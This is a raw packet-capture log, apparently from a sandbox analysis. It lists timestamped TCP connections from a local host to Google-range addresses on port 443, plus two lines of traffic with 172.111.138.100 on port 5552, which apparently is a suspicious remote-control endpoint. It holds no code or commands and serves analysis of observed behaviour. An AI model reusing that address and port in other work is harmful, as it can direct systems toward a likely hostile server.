                                                                                                                                                                Dec 25, 2024 09:08:07.121788025 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.121962070 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.121973991 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.123738050 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:07.123754025 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.124876976 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.124922037 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.125241041 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.125304937 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.125654936 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:07.163346052 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:07.167332888 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.014472961 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.015403986 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.015587091 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.015904903 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016032934 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016067028 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016140938 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016730070 CET49883443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016748905 CET44349883142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.016760111 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.016864061 CET44349890142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.017113924 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018450022 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018464088 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018486977 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018502951 CET44349890142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018620968 CET44349880142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.018683910 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.018683910 CET49880443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.019239902 CET49891443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.019293070 CET44349891142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.019548893 CET49891443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.019548893 CET49891443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.019617081 CET44349891142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.060615063 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.060684919 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.060782909 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.060825109 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.060959101 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.061495066 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.061556101 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.061672926 CET44349882142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.061680079 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.061755896 CET49882443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.062030077 CET49892443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.062067032 CET44349892142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.062125921 CET49892443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.062333107 CET49892443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.062344074 CET44349892142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.309331894 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.309473991 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.309515953 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.309549093 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.309674978 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.309695005 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.309849024 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.310050011 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.310507059 CET49881443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.310528040 CET44349881142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.310986996 CET49895443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.311023951 CET44349895142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.313247919 CET49895443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.313247919 CET49895443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.313280106 CET44349895142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.516956091 CET49890443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.516999006 CET49892443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.517007113 CET49891443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.517448902 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.517463923 CET49895443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:08.517492056 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.520956993 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.520982981 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.521012068 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.521122932 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.521797895 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.521797895 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:08.521810055 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:08.521816015 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.212053061 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.212157965 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.212593079 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.212696075 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.212698936 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.212897062 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.213227987 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.213342905 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.216752052 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.216769934 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.216994047 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.217729092 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.218112946 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.220814943 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.220827103 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.221009970 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.221128941 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.222867012 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:10.263343096 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:10.263364077 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.117091894 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.117161036 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.117171049 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.117212057 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.117363930 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.117393970 CET44349897142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.117466927 CET49897443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.118036032 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.118056059 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.118401051 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.118963003 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.118976116 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.120325089 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.120410919 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.120532990 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.120744944 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.120778084 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.123131037 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.123188019 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.123219967 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.123275042 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.123423100 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.123456955 CET44349896142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.123506069 CET49896443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.123887062 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.123924017 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.123977900 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.124005079 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.124007940 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.124147892 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.124183893 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:11.124205112 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:11.124413013 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:11.124427080 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.807338953 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.807409048 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.807979107 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.808063984 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.811659098 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.811666012 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.811868906 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.811990023 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.812247038 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.814244032 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.814555883 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.815408945 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.815495968 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.817229986 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.817245007 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.817466974 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.817570925 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.818053961 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.818245888 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.818267107 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.818653107 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.818861961 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.819183111 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:12.821903944 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.822113991 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.823020935 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.823118925 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.826505899 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.826522112 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.826864958 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.826967001 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.827279091 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:12.855335951 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.859338045 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.859349966 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:12.867335081 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.705635071 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.705703020 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.705929041 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.705966949 CET44349904142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.706022978 CET49904443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.706547022 CET49920443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.706562996 CET44349920142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.706664085 CET49920443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.706918001 CET49920443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.706928015 CET44349920142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.726753950 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.726824045 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.726846933 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.726896048 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727005959 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727133989 CET44349907142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.727332115 CET49907443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727494955 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727514982 CET44349921142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.727575064 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727813959 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:13.727827072 CET44349921142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741365910 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741425991 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741441965 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741477966 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741506100 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741552114 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.741564989 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.741621017 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742146969 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742177963 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742185116 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742218018 CET44349906142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742245913 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742245913 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742279053 CET49906443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742551088 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742594957 CET44349922142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.742718935 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742866039 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.742885113 CET44349922142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986488104 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986551046 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986577988 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.986601114 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986613035 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.986680031 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.986753941 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.988684893 CET49905443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.988699913 CET44349905142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.989217043 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989274025 CET44349924142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:13.989365101 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989634991 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:13.989655972 CET44349924142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.204741955 CET49920443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.204790115 CET49921443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.204796076 CET49922443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:14.204859972 CET49924443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:14.207710028 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.207745075 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.207890987 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208095074 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208137035 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.208488941 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208772898 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208786011 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.208807945 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:14.208823919 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.243531942 CET555249753172.111.138.100192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:14.300992012 CET497535552192.168.2.4172.111.138.100
                                                                                                                                                                Dec 25, 2024 09:08:15.899086952 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.899171114 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.899740934 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.899799109 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.904486895 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.904495001 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.904704094 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.904808998 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.905124903 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.905720949 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.905802011 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.908678055 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.908803940 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.912358046 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.912368059 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.912787914 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.912894011 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.913197994 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:15.947379112 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:15.955369949 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807085991 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807727098 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807742119 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.807869911 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807940006 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.807984114 CET44349926142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.808063984 CET49926443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.808660030 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.808759928 CET44349934142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.808840990 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.810333967 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810342073 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.810352087 CET44349935142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.810376883 CET44349934142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.810591936 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810683012 CET49935443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.810693979 CET44349935142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816400051 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816555023 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.816561937 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.816658974 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820208073 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820308924 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.820741892 CET44349925142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.820832968 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.820832968 CET49925443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821070910 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821083069 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821115017 CET44349936142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821166039 CET44349937142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821273088 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821281910 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821563959 CET49937443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:16.821599960 CET44349937142.250.181.14192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:16.821862936 CET49936443192.168.2.4142.250.181.97
                                                                                                                                                                Dec 25, 2024 09:08:16.821880102 CET44349936142.250.181.97192.168.2.4
                                                                                                                                                                Dec 25, 2024 09:08:18.204665899 CET49934443192.168.2.4142.250.181.14
                                                                                                                                                                Dec 25, 2024 09:08:18.204701900 CET49935443192.168.2.4142.250.181.97
